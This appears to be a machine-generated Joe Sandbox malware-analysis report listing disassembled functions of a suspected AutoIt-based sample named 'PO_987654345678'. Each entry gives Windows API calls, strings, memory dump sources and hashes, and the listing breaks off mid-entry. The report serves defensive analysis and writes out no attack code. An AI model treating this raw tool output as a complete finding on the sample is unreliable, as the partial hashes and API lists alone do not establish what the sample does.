                          • Opcode Fuzzy Hash: f712d76481347c355db7ddf14b7b70841d56453b22135c7649f4d9ce3c9d26c3
                          • Instruction Fuzzy Hash: 7661A071608301AFD710EF54C849FAAB7E8EF48B10F10484DF985972A1D774EE48EB92
                          Function 00F73388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F733CF
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F733F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-3080491070
                          • Opcode ID: e3e7a32aed7a60e2ae980d4042ea2a5cb795accf851532df0dd657a5f819e9ff
                          • Instruction ID: 0a4d52221d697d15ae90f437b76d0fd647554a1fca86033f021b6bcddc7e88ae
                          • Opcode Fuzzy Hash: e3e7a32aed7a60e2ae980d4042ea2a5cb795accf851532df0dd657a5f819e9ff
                          • Instruction Fuzzy Hash: 6C519271D0420ABADF19EBA0CD42EEEB779AF04300F544166F505B2092EB796F58FB61
                          Function 00F6B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                          • API String ID: 1256254125-769500911
                          • Opcode ID: b5c87639251579f2b2dea347a43ad4d0687a3cfff180e460078a52fb4ff58393
                          • Instruction ID: e7d2bc542e54ec1a15d075a7dbe55064813e239d9ee18d189ba7b5209304c389
                          • Opcode Fuzzy Hash: b5c87639251579f2b2dea347a43ad4d0687a3cfff180e460078a52fb4ff58393
                          • Instruction Fuzzy Hash: E041D332E001279ACB206F7DCD915BEB7A5AFA0764B244269E421DB284E776CDC1E790
                          Function 00F75393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F753A0
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F75416
                          • GetLastError.KERNEL32 ref: 00F75420
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00F754A7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 9c5c074b0d69597a3f8029bd95cb3a4caedf9cf830b60b5c9e92719807b783a6
                          • Instruction ID: a5cbb6e1c939491fe862a3513747a74a1a48c190a93b4be73cd57db78e82c256
                          • Opcode Fuzzy Hash: 9c5c074b0d69597a3f8029bd95cb3a4caedf9cf830b60b5c9e92719807b783a6
                          • Instruction Fuzzy Hash: E031C236E001059FD710DF68C895FAA7BB4EF04715F14C05AE40ACB292DBB1ED82EB92
                          Function 00F93C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateMenu.USER32 ref: 00F93C79
                          • SetMenu.USER32(?,00000000), ref: 00F93C88
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F93D10
                          • IsMenu.USER32(?), ref: 00F93D24
                          • CreatePopupMenu.USER32 ref: 00F93D2E
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F93D5B
                          • DrawMenuBar.USER32 ref: 00F93D63
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                          • String ID: 0$F
                          • API String ID: 161812096-3044882817
                          • Opcode ID: 24cf820bfae21acf2309d5bfe5c7abea1564890e77698ef8f01f78857cb91a24
                          • Instruction ID: 1342bec8caaed5187fe7d011de13c1a2599c4ec36f0556d2a55fad4f7e48648e
                          • Opcode Fuzzy Hash: 24cf820bfae21acf2309d5bfe5c7abea1564890e77698ef8f01f78857cb91a24
                          • Instruction Fuzzy Hash: 5A414CB5A01209EFEF14CFA4D854AAA7BB5FF49350F14002AF94697360D770AA10EF94
                          Function 00F61EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F61F64
                          • GetDlgCtrlID.USER32 ref: 00F61F6F
                          • GetParent.USER32 ref: 00F61F8B
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F61F8E
                          • GetDlgCtrlID.USER32(?), ref: 00F61F97
                          • GetParent.USER32(?), ref: 00F61FAB
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F61FAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 711023334-1403004172
                          • Opcode ID: b4e0dbb30c01fbf5d078ed8c57ee16912202724c452858544ec03318421778f8
                          • Instruction ID: 98ebacc11b304ecf56b6e1c6a6cf2e563f7325570f4706b0f85ad6a9ee0c163c
                          • Opcode Fuzzy Hash: b4e0dbb30c01fbf5d078ed8c57ee16912202724c452858544ec03318421778f8
                          • Instruction Fuzzy Hash: F121B371D00118BBCF04AFA0DC45EEEBBB4AF15310F004116B955672D1DB795914BB60
                          Function 00F93A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F93A9D
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F93AA0
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F93AC7
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F93AEA
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F93B62
                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00F93BAC
                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00F93BC7
                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00F93BE2
                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00F93BF6
                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00F93C13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: c9c58bb32c416fc72f01f2dac22eb983298ab9fdeab1e346d98e66e96fb60fa3
                          • Instruction ID: c9b08deab6c3993dedc076f2b6c4e67ec6d0ced1771f81ed29cd58230946a715
                          • Opcode Fuzzy Hash: c9c58bb32c416fc72f01f2dac22eb983298ab9fdeab1e346d98e66e96fb60fa3
                          • Instruction Fuzzy Hash: 2F617D75900208AFEB10DFA4CC81EEE77F9EB49710F10015AFA15A7291D774AE45EB50
                          Function 00F6B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00F6B151
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B165
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00F6B16C
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B17B
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F6B18D
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B1A6
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B1B8
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B1FD
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B212
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B21D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: ad4b2fa7a719eeed0435aa8649d380356eb93b67b66a874ef92e869eebe3699b
                          • Instruction ID: 27c093c9ef9cbd3850162190fe224e7efa7da6fb28a2acd070cf596f7fdd2a16
                          • Opcode Fuzzy Hash: ad4b2fa7a719eeed0435aa8649d380356eb93b67b66a874ef92e869eebe3699b
                          • Instruction Fuzzy Hash: B431AD71900208BFDB119F64DC68B6E7BAABB51325F108016FB05D6190D7B49E80BFA1
                          Function 00F32C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00F32C94
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F32CA0
                          • _free.LIBCMT ref: 00F32CAB
                          • _free.LIBCMT ref: 00F32CB6
                          • _free.LIBCMT ref: 00F32CC1
                          • _free.LIBCMT ref: 00F32CCC
                          • _free.LIBCMT ref: 00F32CD7
                          • _free.LIBCMT ref: 00F32CE2
                          • _free.LIBCMT ref: 00F32CED
                          • _free.LIBCMT ref: 00F32CFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: fe6f2646955a864cc3f3a1531621f513e641ee0abfbccb1588d866af8ee37d78
                          • Instruction ID: 909fc3512af9a9f15ed6c902e45331a0ce0a4040da48bd640d7edd5163e43f97
                          • Opcode Fuzzy Hash: fe6f2646955a864cc3f3a1531621f513e641ee0abfbccb1588d866af8ee37d78
                          • Instruction Fuzzy Hash: 47119376501118AFCB82EF58EC82DDD7BB5FF05360F4144A5FA489B222DA35EA50BB90
                          Function 00F01410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F01459
                          • OleUninitialize.OLE32(?,00000000), ref: 00F014F8
                          • UnregisterHotKey.USER32(?), ref: 00F016DD
                          • DestroyWindow.USER32(?), ref: 00F424B9
                          • FreeLibrary.KERNEL32(?), ref: 00F4251E
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F4254B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: 854b11a36fd30cc9e3facc8d36b6ce2cd05fd662c95d62b35760744cf0e8e0ab
                          • Instruction ID: b6b1a317cfeb50245a7917088f4cc519f43488b049775f15f616827c07cc1749
                          • Opcode Fuzzy Hash: 854b11a36fd30cc9e3facc8d36b6ce2cd05fd662c95d62b35760744cf0e8e0ab
                          • Instruction Fuzzy Hash: F4D17F31701212CFDB19DF14C895B29FBA0BF05710F5542ADE84A6B2A2DB31AD52FF91
                          Function 00F77DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F77FAD
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F77FC1
                          • GetFileAttributesW.KERNEL32(?), ref: 00F77FEB
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F78005
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78017
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78060
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F780B0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile
                          • String ID: *.*
                          • API String ID: 769691225-438819550
                          • Opcode ID: c592be9c45e31415db949e27ea7f60b980f38c9da636af6ad7c448fa2c3cee30
                          • Instruction ID: 7ca6e0e2fca4897cba96668be6f57ee9cbc777ede8fc2d5fbcca333d394023db
                          • Opcode Fuzzy Hash: c592be9c45e31415db949e27ea7f60b980f38c9da636af6ad7c448fa2c3cee30
                          • Instruction Fuzzy Hash: A48180729183459BDB20EF14C844AAEB3D8BB88364F148C6FF889C7250DB74DD45AB93
                          Function 00F05BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00F05C7A
                            • Part of subcall function 00F05D0A: GetClientRect.USER32(?,?), ref: 00F05D30
                            • Part of subcall function 00F05D0A: GetWindowRect.USER32(?,?), ref: 00F05D71
                            • Part of subcall function 00F05D0A: ScreenToClient.USER32(?,?), ref: 00F05D99
                          • GetDC.USER32 ref: 00F446F5
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F44708
                          • SelectObject.GDI32(00000000,00000000), ref: 00F44716
                          • SelectObject.GDI32(00000000,00000000), ref: 00F4472B
                          • ReleaseDC.USER32(?,00000000), ref: 00F44733
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F447C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: f2160e68cf7d01baaeb939cdaf7838b6ef20dd3c4d94882545d12330dd66e17e
                          • Instruction ID: 7c613f42331a48e8bce235463fecd06a539b2c54f427bfc3bf05d76911eeddad
                          • Opcode Fuzzy Hash: f2160e68cf7d01baaeb939cdaf7838b6ef20dd3c4d94882545d12330dd66e17e
                          • Instruction Fuzzy Hash: 9571D331900209DFDF218F64C984BBA7FB5FF46364F14426AED556A1A6C731A842FF50
                          Function 00F7359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00F735E4
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • LoadStringW.USER32(00FD2390,?,00000FFF,?), ref: 00F7360A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-2391861430
                          • Opcode ID: edb2f444092cbb1f6dd7a156c60fdfaea52172b00e57aac01848a2dfb6850f77
                          • Instruction ID: 2ed9fa976509df6cee2edd8dec91dac005569f43065a6e686ec92a022a6dbf8e
                          • Opcode Fuzzy Hash: edb2f444092cbb1f6dd7a156c60fdfaea52172b00e57aac01848a2dfb6850f77
                          • Instruction Fuzzy Hash: F8517071C0421ABADF19EBA0CC42EEEBB79EF04310F444126F10572192EB755A99FFA1
                          Function 00F7C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7C272
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7C29A
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7C2CA
                          • GetLastError.KERNEL32 ref: 00F7C322
                          • SetEvent.KERNEL32(?), ref: 00F7C336
                          • InternetCloseHandle.WININET(00000000), ref: 00F7C341
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 3113390036-3916222277
                          • Opcode ID: 4e298b0bf934727a48a620cdf31409d1424f1835a1d5496bd2fed568c44ce9a5
                          • Instruction ID: b52eca57eacb2cf7380a3fca0e1262d01513ca23a9b25f41113e5ea3f7d3b047
                          • Opcode Fuzzy Hash: 4e298b0bf934727a48a620cdf31409d1424f1835a1d5496bd2fed568c44ce9a5
                          • Instruction Fuzzy Hash: E0314DB1500608AFD7619FA49C88AAB7BFCEB49754B14851FF44AD2201DB34DD44ABB2
                          Function 00F6989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F43AAF,?,?,Bad directive syntax error,00F9CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F698BC
                          • LoadStringW.USER32(00000000,?,00F43AAF,?), ref: 00F698C3
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F69987
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString_wcslen
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 858772685-4153970271
                          • Opcode ID: 50eb4652bbb4c1cf762535c4acb0b7d181089dd6c5df3e2d3873944b69a65dd5
                          • Instruction ID: 017008e2d194d28a2e435e2797dd8bc7a12762309f6a74677d489b1a00214489
                          • Opcode Fuzzy Hash: 50eb4652bbb4c1cf762535c4acb0b7d181089dd6c5df3e2d3873944b69a65dd5
                          • Instruction Fuzzy Hash: F3217C32C0821AABDF15EF90CC46EEE7779FF18300F04446AF515A20A2EB75A658FB51
                          Function 00F6209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32 ref: 00F620AB
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00F620C0
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F6214D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
